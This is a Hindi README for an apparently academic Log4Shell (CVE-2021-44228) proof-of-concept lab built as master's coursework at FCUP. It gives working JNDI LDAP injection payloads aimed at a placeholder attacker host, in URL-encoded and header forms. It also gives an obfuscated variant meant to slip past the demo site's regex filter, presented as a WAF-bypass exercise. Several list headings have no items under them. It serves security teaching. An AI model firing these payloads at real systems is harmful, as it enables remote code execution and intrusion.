
CVE-2021-44228 (लॉग4शेल) कमज़ोरी के लिए प्रूफ ऑफ कॉन्सेप्ट, जिसे FCUP में सूचना सुरक्षा में मास्टर्स डिग्री के पाठ्यक्रम इकाई TPAS के coursework के भाग के रूप में विकसित किया गया।
यह रिपॉजिटरी Log4Shell भेद्यता (CVE-2021-44228) के लिए एक प्रमाण-अवधारणा (PoC) रखता है, जिसे FCUP में सूचना सुरक्षा में मास्टर डिग्री के पाठ्यक्रम के भाग के रूप में विकसित किया गया है।
इसमें शामिल है:
इस स्टैक को चलाने के लिए आपको चाहिए:
एक बार सब कुछ चल रहा हो:
इस पेलोड को सर्च बार में रखें (URL-एन्कोडेड क्योंकि यह GET क्वेरी पैरामीटर पर होगा):
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
या इस पेलोड को किसी अनुरोध के हेडर में रखें (आप अनुरोध को इंटरसेप्ट करने और उसे बदलने के लिए burp suite का उपयोग कर सकते हैं):
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
वेबसाइट पर, उपयोगकर्ता के नाम के बगल में एक आइकन है जो \$\{jndi:.*?} नियमित अभिव्यक्ति का उपयोग करके लॉग किए गए स्ट्रिंग को सैनिटाइज़ करने या न करने के बीच टॉगल करने की अनुमति देता है। डिफ़ॉल्ट रूप से, सैनिटाइज़ेशन अक्षम है, जिसे एक लाल दानव आइकन द्वारा दर्शाया गया है। जब सैनिटाइज़ेशन सक्षम होता है, तो आइकन हरे स्माइली चेहरे में बदल जाता है।
इस सुविधा का उपयोग WAF बायपास के अनुकरण के रूप में किया जा सकता है, आप बैकएंड के LoggerManager.java क्लास में और नियमित अभिव्यक्तियाँ जोड़ सकते हैं।
यहाँ एक पेलोड है जो वर्तमान regex से मेल नहीं खाएगा:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}